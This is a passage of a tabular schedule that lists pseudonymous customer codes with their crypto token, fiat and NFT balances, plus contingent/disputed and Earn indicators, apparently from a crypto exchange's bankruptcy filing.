| 07376146 | | BCH[.0000016], BRZ[1], BTC[0], CAD[0.00], CUSDT[1], DOGE[1], ETH[0], ETHW[0.02734351], LINK[0.00003808], LTC[0], SHIB[15], SOL[0], TRX[3.00093156], USD[0.01], USDT[0.00000278] | Yes | |
| 07376147 | | TRX[0], USDT[12.44391521] | | |
| 07376148 | | BTC[.0095568], DOGE[976.057], ETH[.242469], ETHW[.242469], MATIC[10], SUSHI[4.983], UNI[13.848], USD[9.54], YFI[.001992] | | |
| 07376149 | | BRZ[3], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07376150 | | CUSDT[16], DOGE[13.49098075], ETH[0], TRX[1], USD[0.01] | | |
| 07376151 | | USD[10.00] | | |
| 07376152 | | BRZ[1], CUSDT[10], USD[0.01] | | |
| 07376153 | | BRZ[1], CUSDT[6], DOGE[3], GRT[2], MATIC[137.35923374], TRX[2642.43350791], USD[0.00] | | |
| 07376154 | | BRZ[1], DOGE[396.6189425], TRX[72.56885148], USD[0.00] | | |
| 07376155 | | USD[10.00] | | |
| 07376156 | | USD[10.00] | | |
| 07376158 | | DOGE[1.89389574], USD[7.60] | | |
| 07376159 | | USD[10.00] | | |
| 07376160 | | USD[10.00] | | |
| 07376161 | | TRX[166.44396464], USD[0.00] | | |
| 07376162 | | BRZ[2], CUSDT[3], DOGE[1271.72084969], SHIB[3203116.33235689], TRX[4], USD[0.00] | Yes | |
| 07376163 | | BTC[.00257756], CUSDT[1040.6370922], DAI[21.94298533], DOGE[3537.48966844], KSHIB[133.71323938], SHIB[699941.56489306], TRX[1202.81289139], USD[0.00] | Yes | |
| 07376164 | | AVAX[0], ETH[0], LINK[0.62235975], MATIC[0], SOL[0], USD[0.00], USDT[0.00000039] | | |
| 07376165 | | ETH[.00009337], ETHW[.00009337], GRT[1.00498957], TRX[2], USD[0.00] | Yes | |
| 07376166 | | USD[10.00] | | |
| 07376167 | | AAVE[.12184309], AVAX[.51619262], BCH[.048315], BTC[.00504021], CUSDT[7], DOGE[978.20528506], ETH[.07216271], ETHW[.06460368], LINK[.44986867], LTC[.1220668], MATIC[24.58073712], MKR[.01339697], NEAR[2.35590374], SHIB[11], SOL[3.43767504], SUSHI[.81343461], TRX[273.55344981], USD[7.74] | Yes | |
| 07376168 | | BRZ[1], BTC[.12366792], CUSDT[5], DOGE[371.93238573], ETH[1.6994976], ETHW[1.69876825], GRT[1055.72188671], LINK[64.43134141], LTC[2.27928613], MATIC[158.7873744], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07376169 | | DOGE[1026.08270902], USD[0.00] | Yes | |
| 07376171 | | USD[10.00] | | |
| 07376172 | | USD[10.00] | | |
| 07376173 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376174 | | BRZ[1], CUSDT[38], DOGE[0.00153056], ETH[0], ETHW[0.02313747], GRT[0], LTC[0.00000539], SHIB[3], TRX[4], USD[11.00], USDT[0] | Yes | |
| 07376175 | | BAT[1], BCH[.1007816], BRZ[2], CUSDT[5], DOGE[79.92940751], GRT[2], LTC[2.88697655], SOL[1], TRX[6], USD[0.01] | | |
| 07376176 | | DOGE[109.15330565], SHIB[12517.09130371], TRX[26.42741921], USD[0.00] | Yes | |
| 07376179 | | BAT[1.01594302], BTC[.00455394], CUSDT[3], DOGE[1811.96242318], ETH[.05740626], ETHW[.0566949], TRX[1], USD[0.89] | Yes | |
| 07376183 | | USD[10.00] | | |
| 07376184 | | BRZ[1], CUSDT[5], DOGE[2.00017317], TRX[1], USD[0.00] | Yes | |
| 07376185 | | DOGE[.00302219], USD[0.00] | Yes | |
| 07376187 | | DOGE[154.59682847], USD[0.00] | | |
| 07376188 | | MATIC[0], USD[0.00] | | |
| 07376189 | | BTC[.00497327], USD[227.52] | Yes | |
| 07376190 | | DOGE[1.02027091], USD[0.00] | | |
| 07376192 | | DOGE[25.37777987], USD[0.00] | Yes | |
| 07376193 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07376194 | | DOGE[165.72993346], USD[0.00] | | |
| 07376195 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07376196 | | USD[10.00] | | |
| 07376197 | | BTC[.00009447], DOGE[50.82145952], USD[6.49] | | |
| 07376198 | | DOGE[125.19546141], USD[0.00] | | |
| 07376199 | | USD[10.00] | | |
| 07376200 | | USD[10.00] | | |
| 07376201 | | CUSDT[5], DOGE[2275.14423554], TRX[1], USD[0.00] | Yes | |
| 07376202 | | BCH[.50028529], CUSDT[2], DOGE[250.62155737], ETH[.06171695], ETHW[.06095087], LINK[2.78644223], SHIB[3], SOL[1.11452091], TRX[128.97869415], UNI[1.47595626], USD[0.15], USDT[11.19933812] | Yes | |
| 07376203 | | BAT[4.40820895], BRZ[6.48229204], BTC[0], CUSDT[3], DAI[0.86408970], DOGE[2], ETH[0], GRT[1.00498957], LINK[0], MATIC[0], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07376204 | | DOGE[39.75623768], USD[0.00] | | |
| 07376205 | | USD[10.00] | | |
| 07376207 | | USD[10.00] | | |
| 07376208 | | BRZ[2], CUSDT[2], TRX[2], USD[0.00] | | |
| 07376209 | | USD[10.00] | | |
| 07376210 | | DOGE[1], ETH[.00566054], ETHW[.00566054], USD[0.00] | | |
| 07376211 | | USD[10.00] | | |
| 07376213 | | CUSDT[1], USD[0.00] | | |
| 07376214 | | TRX[1], USD[0.77], USDT[0] | | |
| 07376215 | | BRZ[1], DOGE[2470.54075021], USD[507.38] | | |
| 07376216 | | USD[0.00] | | |
| 07376219 | | BAT[.00159542], BRZ[.84033984], CUSDT[2], DOGE[1.42590867], SOL[.00229757], TRX[.93659283], USD[0.37] | | |
| 07376220 | | ETH[.00000001], ETHW[0], USD[0.01], USDT[0] | Yes | |
| 07376221 | | BRZ[1], CUSDT[77], DOGE[14364.23397681], TRX[9], USD[0.00] | | |
| 07376222 | | USD[10.00] | | |
| 07376223 | | BF_POINT[100], BTC[0], SOL[0], USD[0.01], USDT[0] | | |
| 07376224 | | DOGE[1], GRT[25.29048844], USD[0.00] | | |
| 07376225 | | USD[10.00] | | |
| 07376226 | | SOL[.00036612], USD[10.55] | | |
| 07376227 | | CUSDT[3], DOGE[5760.14564893], SHIB[2035417.24262161], TRX[2], USD[0.00] | | |
| 07376228 | | BTC[.00031925], CUSDT[528.29698151], DOGE[850.04813867], ETH[.29726008], ETHW[.29706496], MATIC[35.37159215], SOL[3.08489888], TRX[254.4554587], USD[0.86] | Yes | |
| 07376229 | | DOGE[177.55057616], USD[0.00] | | |
| 07376230 | | USD[10.00] | | |
| 07376231 | | USD[10.00] | | |
| 07376232 | | USD[10.00] | | |
| 07376233 | | USD[10.00] | | |
| 07376234 | | USD[10.00] | | |
| 07376235 | | DOGE[176.46712117], USD[0.00] | | |
| 07376236 | | DOGE[2], TRX[2], USD[0.00] | | |
| 07376238 | | ETH[.00548426], ETHW[.00548426], USD[0.00] | | |
| 07376239 | | BRZ[8.84386645], CUSDT[11], DOGE[.0004567], TRX[.0089541], USD[3.13], USDT[2.21096664] | Yes | |
| 07376240 | | USD[10.00] | | |
| 07376241 | | BRZ[1], ETH[10.8607102], ETHW[10.85678693], GRT[1.0034949], LINK[1.08501105], TRX[1], USD[0.01], USDT[1.0849963] | | |
| 07376242 | | DOGE[136.27071212], USD[0.00] | | |
| 07376243 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376244 | | USD[10.00] | | |
| 07376245 | | USD[10.00] | | |
| 07376246 | | USD[0.00] | Yes | |
| 07376247 | | USD[10.00] | | |
| 07376248 | | CUSDT[1], DOGE[1777.50823067], USD[0.00] | | |
| 07376249 | | DOGE[1], USD[0.00] | | |
| 07376250 | | USD[10.00] | | |
| 07376252 | | USD[10.00] | | |
| 07376253 | | CUSDT[1], USD[10.39] | | |
| 07376255 | | BRZ[1], CUSDT[2], DOGE[1.59717023], USD[0.69], USDT[0.00002603] | | |
| 07376256 | | USD[10.00] | | |
| 07376257 | | DOGE[199.89607601], KSHIB[.39249366], NFT (298108161115146651/My Little Gang #10)[1], NFT (30152238404015792/Game #5)[1], NFT (31530235368460573/Game #11)[1], SHIB[5], SOL[.004296811], USD[0.00] | Yes | |
| 07376258 | | BRZ[1], CUSDT[1], DOGE[4734.47776073], TRX[1], USD[148.09] | | |
| 07376259 | | USD[0.01], USDT[1] | | |
| 07376260 | | USD[10.00] | | |
| 07376261 | | BTC[.00010257], ETH[.00324576], ETHW[.00324576], USD[0.00] | | |
| 07376262 | | BAT[1.00020999], CUSDT[3], USD[0.01] | | |
| 07376264 | | SOL[1.28979124], TRX[1218.37040222], USD[0.00], USDT[0] | | |
| 07376266 | | USD[10.00] | | |
| 07376267 | | USD[10.00] | | |
| 07376269 | | USD[10.00] | | |
| 07376270 | | BRZ[1], BTC[.009676811], CUSDT[3], DOGE[4202.66406393], PAXG[.25604369], SOL[1.04954057], TRX[1], UNI[10.25178163], USD[0.00] | | |
| 07376272 | | BRZ[2], BTC[.01478194], CUSDT[3], DOGE[6.16561192], GRT[89.50285882], LINK[24.21881171], SOL[55.43992940], SUSHI[21.39588061], TRX[2], USD[4.06], USDT[5.44298487] | Yes | |
| 07376273 | | DOGE[134.6053358], USD[0.00] | | |
| 07376274 | | USD[10.00] | | |
| 07376275 | | USD[10.00] | | |
| 07376276 | | DOGE[ 13034374], USD[0.00] | | |
| 07376277 | | BRZ[2], CUSDT[1], DOGE[1.31488919], SHIB[16397637.10337981], TRX[1], USD[0.08] | | |
| 07376279 | | USD[10.00] | | |
| 07376280 | | BRZ[1], BTC[0], DOGE[0], GRT[407.37992431], LTC[0], MATIC[.00040287], SHIB[2], TRX[1], USD[0.00], USDT[0] | | |
| 07376281 | | USD[10.00] | | |
| 07376282 | | BRZ[1], TRX[2], USD[104.93] | | |
| 07376283 | | CUSDT[11], DOGE[1378.79366776], GRT[.00002417], SHIB[267757.48252536], TRX[1], USD[0.72] | | |
| 07376285 | | BRZ[2], DOGE[11808.91385978], TRX[1], USD[75.34] | | |
| 07376286 | | BAT[49.36405164], BTC[.00079001], DOGE[300.5872154], TRX[453.88244232], USD[0.00] | | |
| 07376287 | | CUSDT[1], DOGE[48.65648036], USD[0.73] | | |
| 07376288 | | DOGE[199.05203459], USD[0.00] | | |
| 07376289 | | DOGE[1599.30271499], USD[0.00] | | |
| 07376290 | | DOGE[1], TRX[1], USD[0.74] | | |
| 07376291 | | BRZ[1], CUSDT[15], TRX[1], USD[0.48], USDT[0] | Yes | |
| 07376292 | | USD[10.00] | | |
| 07376293 | | USD[10.00] | | |
| 07376294 | | CUSDT[3], DOGE[89.80073864], LTC[0.11982788], USD[0.00] | Yes | |
| 07376295 | | DOGE[2231.79807098], USD[10.00] | | |
| 07376296 | | BRZ[2], CUSDT[17], DOGE[29.16689448], TRX[102.37321403], USD[0.00] | Yes | |
| 07376297 | | BTC[.00003173], USD[0.00], USDT[0] | | |
| 07376298 | | USD[10.00] | | |
| 07376299 | | BRZ[1], CUSDT[2], DOGE[1662.88795145], SUSHI[35.60491839], TRX[1], USD[0.00] | | |
| 07376300 | | USD[10.00] | | |
| 07376301 | | USD[10.00] | | |
| 07376302 | | DOGE[1], USD[0.00] | | |
| 07376303 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07376304 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07376305 | | CUSDT[1], DOGE[ 25568494], TRX[2], USD[0.01] | | |
| 07376306 | | USD[10.00] | | |
| 07376307 | | CUSDT[9], GRT[1.00149878], TRX[3], USD[65.01] | Yes | |
| 07376308 | | USD[10.00] | | |
| 07376309 | | CUSDT[3], DOGE[12542.23922841], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376310 | | USD[10.00] | | |
| 07376311 | | USD[10.00] | | |
| 07376312 | | DOGE[1], USD[0.01] | | |
| 07376314 | | USD[10.00] | | |
| 07376316 | | BRZ[1], CUSDT[8], DOGE[161.26692836], USD[0.00] | | |
| 07376317 | Contingent, Disputed | BRZ[1], CUSDT[1.31389816], DOGE[0], USD[0.00] | Yes | |
| 07376318 | | CUSDT[4], DOGE[297.35197965], USD[0.05] | Yes | |
| 07376319 | | DOGE[498.80267788], USD[0.00] | | |
| 07376322 | | USD[10.00] | | |
| 07376323 | | USD[10.00] | | |
| 07376325 | | USD[10.00] | | |
| 07376326 | | DOGE[52.252388], USD[0.00] | Yes | |
| 07376327 | | BRZ[2], CUSDT[5], DOGE[.08282252], TRX[1], USD[0.00], USDT[0.04506732] | | |
| 07376328 | | DOGE[37.61144883], USD[0.00] | | |
| 07376329 | | BRZ[1], USD[0.00], USDT[0.00000001] | | |
| 07376330 | | BAT[1], CUSDT[1], DOGE[1330.28804525], TRX[11970.27011398], USD[0.00], USDT[1] | | |
| 07376331 | | USD[10.00] | | |
| 07376333 | | DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07376334 | | DOGE[45.74715050], GRT[0], LTC[0], SHIB[9109725.51044343], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07376335 | | ETH[.01293259], ETHW[.01293259] | | |
| 07376336 | | USD[994.33] | | |
| 07376337 | | USD[0.35] | | |
| 07376338 | | USD[2.00] | | |
| 07376339 | | USD[0.08] | | |
| 07376340 | | DOGE[134.49041846], USD[0.07] | | |
| 07376341 | | ETH[.00618137], ETHW[.00609929], USD[0.00] | Yes | |
| 07376342 | | CUSDT[1], DOGE[119.69738756], USD[0.63] | | |
| 07376343 | | CUSDT[467.75825127], TRX[1], USD[0.10] | | |
| 07376344 | | USD[10.00] | | |
| 07376345 | | DOGE[18179.70613549], TRX[1], USD[10.00] | | |
| 07376347 | | USD[10.00] | | |
| 07376348 | | BRZ[2], CUSDT[3], TRX[2], USD[0.01] | | |
| 07376349 | | DOGE[524.28744514], SHIB[634421.56078696], USD[0.00] | Yes | |
| 07376350 | | BRZ[1], DOGE[1986.9271188], TRX[1], USD[0.00] | | |
| 07376351 | | BRZ[1], BTC[.00021761], CUSDT[2], DOGE[1298.49284181], USD[0.00] | | |
| 07376352 | | USD[0.01], USDT[0] | | |
| 07376353 | | CUSDT[5], DOGE[32.21143452], SOL[125.73984996], SUSHI[6.75265185], USD[0.00] | Yes | |
| 07376354 | | BTC[.00032129], CUSDT[2], DOGE[60.98118535], USD[0.04] | | |
| 07376355 | | USD[10.00] | | |
| 07376356 | | CUSDT[3], SHIB[4803089.93449756], USD[134.55], USDT[0] | | |
| 07376357 | | USD[10.00] | | |
| 07376358 | | USD[10.00] | | |
| 07376359 | | USD[4.85] | | |
| 07376360 | | CUSDT[12], DOGE[4.05213569], USD[0.00] | Yes | |
| 07376361 | | USD[10.00] | | |
| 07376362 | | CUSDT[1], USD[0.00] | | |
| 07376363 | | USD[10.00] | | |
| 07376364 | | USD[0.00] | | |
| 07376366 | | USD[0.01] | | |
| 07376367 | | USD[10.00] | | |
| 07376368 | | DOGE[139.66570176], USD[0.00] | | |
| 07376369 | | BRZ[2], DOGE[2775.93611592], USD[110.00] | | |
| 07376370 | | ETH[0], ETHW[0], SOL[0], USD[0.00] | Yes | |
| 07376371 | | CUSDT[1], USD[0.00] | | |
| 07376372 | | USD[10.00] | | |
| 07376374 | | BAT[1], CUSDT[6], DOGE[0], SHIB[2], TRX[3], USD[0.01] | | |
| 07376375 | | USD[10.00] | | |
| 07376376 | | CUSDT[5], GRT[.00002192], TRX[2.00069369], UNI[.00003759], USD[0.01], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376377 | | USD[10.00] | | |
| 07376378 | | DOGE[1300.9073426], USD[10.00] | | |
| 07376379 | | BRZ[5.07952967], CUSDT[35], DOGE[2], ETH[0], SHIB[2], TRX[6.000279], USD[0.00] | Yes | |
| 07376380 | | USD[10.00] | | |
| 07376381 | | DOGE[1], USD[0.00] | | |
| 07376382 | | CUSDT[2.1561815], ETH[.00496837], ETHW[.00496837], USD[0.00] | | |
| 07376383 | | BTC[.00232369], DOGE[1], ETH[.06138065], ETHW[.0606174], TRX[1], USD[0.00] | Yes | |
| 07376384 | | BRZ[1], BTC[.001355599], CUSDT[4], DOGE[4503.61552125], GRT[2.0768361], TRX[1], USD[0.01] | Yes | |
| 07376385 | | BTC[0], DOGE[0], ETH[0], SUSHI[0.0], USD[0.00] | | |
| 07376386 | | USD[10.00] | | |
| 07376387 | | USD[10.00] | | |
| 07376388 | | CUSDT[6], DOGE[3], SHIB[1], USD[0.01] | | |
| 07376390 | | BRZ[1], CUSDT[14], DOGE[1], TRX[4], USD[0.00] | Yes | |
| 07376391 | | USD[10.00] | | |
| 07376392 | | BRZ[1], DOGE[7688.18878692], USD[0.40] | Yes | |
| 07376393 | | BRZ[3], CUSDT[4], DOGE[4852.29847448], USD[0.00] | Yes | |
| 07376394 | | USD[0.01] | | |
| 07376395 | | USD[10.00] | | |
| 07376396 | | BAT[1.0165555], DOGE[11106.85170935], USD[79.14], USDT[1.11043116] | Yes | |
| 07376397 | | DOGE[134.89718743], USD[0.00] | | |
| 07376399 | | USD[10.00] | | |
| 07376400 | | MATIC[1.4223758], USD[0.00] | Yes | |
| 07376401 | | BAT[1], BTC[.0290832], CUSDT[1], DOGE[6183.81938636], LINK[1], TRX[1], USD[61.18], USDT[1] | | |
| 07376402 | | USD[10.90] | Yes | |
| 07376403 | | USD[10.00] | | |
| 07376405 | | NFT (305763118748283259/014x-BO)[1], NFT (319635710834973969/017x-BO)[1], NFT (321131936708363266/CryptoFabula #6)[1], NFT (332885218835896723/EP4-BO)[1], NFT (341316017168797616/021x-BO)[1], NFT (342828576350507187/Oink 1749)[1], NFT (387686245961613955/Power Cord)[1], NFT (389571686968280724/Abstracticart #3)[1], NFT (397148441103069566/Gangster Gorillas #5441)[1], NFT (400386611095419029/012x-BO)[1], NFT (433385528039630741/013x-BO)[1], NFT (464355144785944493/08x-BO)[1], NFT (473345103803573150/018x-BO)[1], NFT (474403502788426980/Gangster Gorillas #9239)[1], NFT (477539931393831939/016x-BO)[1], NFT (478168390839150975/Skull cervello)[1], NFT (520099632699453734/010x-BO)[1], NFT (522858897721304483/03x-BO)[1], NFT (553687022064247992/Surfer Girl)[1], NFT (569024656204162415/EP8-BO)[1], SHIB[33232.38849856], SOL[0.946474361], USD[0.00] | Yes | |
| 07376406 | | BTC[0.00108736], SOL[.00524072], SUSHI[.395], UNI[.0288], USD[0.00], USDT[0] | | |
| 07376407 | | USD[10.00] | | |
| 07376408 | | BTC[0], DOGE[4], TRX[4], USD[0.00] | | |
| 07376409 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07376410 | | BTC[.00108223], DOGE[3], ETH[.08307572], ETHW[.08307572], TRX[1], USD[0.00] | | |
| 07376411 | | USD[10.00] | | |
| 07376412 | | CUSDT[3], DOGE[6760.13023466], TRX[5], USD[0.00] | | |
| 07376413 | | USD[10.00] | | |
| 07376414 | | DOGE[134.96107182], TRX[1], USD[0.00] | | |
| 07376415 | | CUSDT[451.38542913], DOGE[1.56420859], USD[0.01] | | |
| 07376416 | | BRZ[1], CUSDT[2499.31732438], DOGE[1465.25216097], TRX[3], USD[0.00] | | |
| 07376418 | | USD[10.00] | | |
| 07376421 | | DOGE[.00179341], USD[0.00] | Yes | |
| 07376422 | | CUSDT[1], DOGE[59.93750789], TRX[1], USD[0.46] | | |
| 07376423 | | USD[10.00] | | |
| 07376424 | | BAT[0], BRZ[3], CUSDT[12], DOGE[0], GRT[5.21021699], KSHIB[0], LTC[0], MATIC[0], SUSHI[1.08411432], TRX[1], USD[0.64], USDT[3.25385794] | Yes | |
| 07376425 | | CUSDT[2], USD[0.38] | | |
| 07376426 | | USD[10.00] | | |
| 07376427 | | CUSDT[5], DOGE[271.20186548], USD[0.00] | | |
| 07376428 | | DOGE[135.28145848], USD[0.00] | | |
| 07376429 | | CUSDT[1], DOGE[2.38342046], TRX[1], USD[28.25] | | |
| 07376430 | | BAT[.00003823], BRZ[3], BTC[.0000006], CUSDT[478.91232574], DOGE[1025.18079751], ETH[.08388821], ETHW[.06716422], MATIC[23.42560836], SHIB[1688446.52836968], SOL[.33141249], SUSHI[16.83415982], TRX[8.00079945], USD[0.01], WBTC[.00052077], YFI[.00193812] | Yes | |
| 07376431 | | DOGE[12413.22493073], TRX[3], USD[41.69] | Yes | |
| 07376432 | | USD[0.00] | | |
| 07376433 | | BAT[2], BCH[0], BRZ[6], CUSDT[11], DOGE[2], ETH[0.21621405], ETHW[0.21621404], GRT[0], LINK[0], SOL[0], TRX[6.00004387], USD[0.00], USDT[5] | | |
| 07376434 | | BAT[2], BRZ[1], TRX[2], USD[0.00], USDT[4] | | |
| 07376435 | | USD[10.00] | | |
| 07376436 | | USD[10.00] | | |
| 07376437 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376438 | | BTC[0], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07376439 | | CUSDT[2], DOGE[8], ETH[0], ETHW[0], SOL[0], TRX[1], USD[0.01] | | |
| 07376440 | | USD[0.00] | | |
| 07376441 | | USD[0.00] | | |
| 07376443 | | DOGE[186.59156729], USD[0.00] | | |
| 07376444 | | ETH[0], ETHW[0], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07376445 | | CUSDT[2], USD[0.09] | | |
| 07376447 | | USD[10.00] | | |
| 07376448 | | USD[10.00] | | |
| 07376449 | | USD[10.00] | | |
| 07376450 | | BTC[.00460126], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07376451 | | USD[10.00] | | |
| 07376453 | | BRZ[1], BTC[.09881425], CUSDT[22], DOGE[.00693743], TRX[6], USD[0.00] | Yes | |
| 07376454 | | GRT[228.69917499], TRX[1], USD[0.00] | | |
| 07376455 | | BAT[15.89662548], BRZ[1], CUSDT[3], PAXG[.00554374], TRX[2], USD[0.00] | Yes | |
| 07376456 | | DOGE[166.37955102], USD[0.00] | | |
| 07376457 | | USD[0.14] | Yes | |
| 07376458 | | USD[0.01], USDT[0] | | |
| 07376460 | | DOGE[1], TRX[1], USD[29.42] | | |
| 07376461 | | BRZ[1], CUSDT[3], SHIB[1], TRX[1], USD[99.82] | | |
| 07376463 | | USD[10.00] | | |
| 07376464 | | USD[10.00] | | |
| 07376465 | | USD[10.00] | | |
| 07376466 | | DOGE[.072], USD[0.18], USDT[0] | | |
| 07376467 | | DOGE[300.86157031], ETH[.06901343], ETHW[.06901343], SHIB[1022286.83111838], SOL[1.16593601], TRX[5], USD[0.08] | | |
| 07376468 | | DOGE[1], SHIB[1], TRX[2], USD[0.00] | | |
| 07376469 | | CUSDT[2], DOGE[124.66746086], USD[0.00] | | |
| 07376470 | | BRZ[2], CUSDT[2], DOGE[8], TRX[1], USD[0.01] | | |
| 07376471 | | USD[32.36] | | |
| 07376472 | | USD[10.00] | | |
| 07376473 | | USD[10.00] | | |
| 07376474 | | USD[10.00] | | |
| 07376475 | | DOGE[161.29164537], USD[10.91] | Yes | |
| 07376476 | | USD[10.00] | | |
| 07376477 | | CUSDT[5], DOGE[1.44628159], TRX[4], USD[0.30] | | |
| 07376478 | | USD[10.00] | | |
| 07376479 | | USD[10.00] | | |
| 07376480 | | USD[10.00] | | |
| 07376482 | | BTC[.00002927], DOGE[26.02004001], ETH[.00286329], ETHW[.00286329], SOL[.07221686], USD[0.68] | | |
| 07376483 | | BRZ[2], CUSDT[6], GRT[1], TRX[2], USD[0.00] | | |
| 07376484 | | BAT[0.00622033], BRZ[4], CUSDT[12], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07376485 | | BAT[30.8197793], BRZ[3], CUSDT[43], TRX[267.03467274], USD[0.01], USDT[1] | | |
| 07376486 | | USD[10.00] | | |
| 07376487 | | BRZ[1], CUSDT[474.94725093], DOGE[1459.66885322], USD[0.00] | | |
| 07376488 | | BTC[.00021313], CUSDT[1], DOGE[750.91073327], LTC[1.30403482], USD[0.00] | Yes | |
| 07376489 | | BRZ[1], BTC[0.01460378], DOGE[1], USD[10.00] | | |
| 07376490 | | DOGE[148.40770287], USD[0.00] | | |
| 07376491 | | USD[10.00] | | |
| 07376493 | | DOGE[38.53701023], USD[0.00] | | |
| 07376494 | | USD[10.00] | | |
| 07376495 | | USD[10.00] | | |
| 07376496 | | USD[10.00] | | |
| 07376498 | | BRZ[2], CUSDT[1], TRX[1], USD[888.26], USDT[1] | | |
| 07376500 | | USD[0.48] | Yes | |
| 07376501 | | USD[10.00] | | |
| 07376502 | | USD[45.65] | | |
| 07376503 | | DOGE[2], SHIB[392313.23003887], SOL[30.19452669], USD[0.00] | Yes | |
| 07376504 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07376505 | | USD[10.00] | | |
| 07376507 | | USD[10.00] | | |
| 07376509 | | USD[10.00] | | |
| 07376510 | | USD[10.00] | | |
| 07376511 | | CUSDT[1], DOGE[1111.48607552], USD[0.00] | | |
| 07376512 | | DOGE[43.6389145], USD[0.00] | Yes | |
| 07376513 | | CUSDT[7], DOGE[.58818586], TRX[1], USD[24.87] | | |
| 07376516 | | CUSDT[1], USD[0.00] | | |
| 07376517 | | AVAX[3.12720791], BAT[0], BRZ[1], BTC[0], CUSDT[23], DAI[0], DOGE[12.03531815], ETH[0], ETHW[.15358798], KSHIB[0], NFT [322932531185314796/DOTB #3700][1], NFT [442351764608393216/DOTB #825][1], SHIB[35.00000241], SOL[0], TRX[10], USD[50.41], USDT[0.00000042] | Yes | |
| 07376518 | | USD[10.00] | | |
| 07376519 | | CUSDT[2], USD[0.02] | Yes | |
| 07376520 | | BTC[0], ETH[.00000001], LTC[.00004917], USD[0.00], USDT[0.39170264] | | |
| 07376521 | | USD[10.00] | | |
| 07376522 | | DOGE[1612.87709151], ETH[.4786722], ETHW[.4045173], SHIB[1], TRX[114.57595891], USD[1.56] | Yes | |
| 07376524 | | AAVE[0.00001479], CUSDT[2], DOGE[0], TRX[.01138894], USD[0.00], USDT[1.07104948] | Yes | |
| 07376525 | | USD[10.00] | | |
| 07376526 | | SUSHI[.69593557], USD[0.00] | | |
| 07376527 | | BAT[1], BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07376529 | | BRZ[1], CUSDT[5], DOGE[10624.99004158], TRX[6], USD[0.00] | | |
| 07376530 | | CUSDT[2], USD[0.00] | | |
| 07376532 | | USD[0.00] | | |
| 07376533 | | CUSDT[524.41074452], DOGE[179.4990315], GRT[53.70368366], MATIC[27.05542358], SHIB[193581.32012029], TRX[545.92968053], USD[499.33] | Yes | |
| 07376534 | | BRZ[1], CUSDT[2], TRX[1], USD[0.01], USDT[0] | | |
| 07376535 | | USD[10.00] | | |
| 07376536 | | BTC[0.00017751], USD[0.00] | | |
| 07376537 | | BRZ[2], BTC[.00189176], CUSDT[65.04267882], DOGE[12543.84037518], ETH[.24211875], ETHW[.24191985], GRT[1.00404471], MATIC[78.27748723], SOL[5.20874337], TRX[10], USD[11.12], USDT[1.09943246] | Yes | |
| 07376538 | | CUSDT[4], DOGE[119.02791555], USD[0.00] | Yes | |
| 07376539 | | CUSDT[1], USD[0.00] | | |
| 07376540 | | BRZ[1], CUSDT[.00001293], DOGE[100.13467707], SUSHI[1.10372808], TRX[1.00000637], USD[0.01], USDT[2.20808109] | Yes | |
| 07376541 | | SOL[97.66911285], USD[0.30], USDT[0] | | |
| 07376543 | | TRX[1], USD[0.00] | | |
| 07376544 | | USD[10.00] | | |
| 07376545 | | CUSDT[2], SOL[11.6437962], TRX[10208.23873242], USD[54.29], USDT[1.08383092] | Yes | |
| 07376546 | | USD[10.00] | | |
| 07376547 | | USD[10.00] | | |
| 07376548 | | USD[0.00] | | |
| 07376549 | | CUSDT[1], DOGE[14235.57050543], USD[10.00] | | |
| 07376550 | | USD[0.00] | | |
| 07376551 | | BRZ[1], TRX[1], USD[0.00] | Yes | |
| 07376552 | | USD[10.00] | | |
| 07376553 | | USD[10.00] | | |
| 07376554 | | BTC[0], USD[0.00] | | |
| 07376555 | | USD[10.00] | | |
| 07376556 | | DOGE[158.42306892], TRX[1], USD[0.00] | | |
| 07376557 | | USD[10.00] | | |
| 07376558 | | CUSDT[7], DOGE[1254.91769492], ETH[.02464531], ETHW[.02434402], SHIB[2555535.95902199], USD[0.00] | Yes | |
| 07376560 | | BTC[0], CUSDT[3], DOGE[549.35503332], ETH[0.07276207], ETHW[0.07276207], KSHIB[0], MATIC[1.08326820], SHIB[148157.07584067], TRX[0], USD[0.00] | | |
| 07376561 | | USD[10.00] | | |
| 07376562 | | USD[10.00] | | |
| 07376564 | | TRX[206.40755088], USD[0.06] | | |
| 07376565 | | DOGE[154.26759499], USD[0.00] | Yes | |
| 07376566 | | CUSDT[2], DOGE[1], SHIB[8746355.68513119], TRX[2], USD[0.01] | | |
| 07376567 | | USD[10.00] | | |
| 07376568 | | BAT[0], DOGE[0], LTC[0], SUSHI[0], TRX[0], USD[0.01] | | |
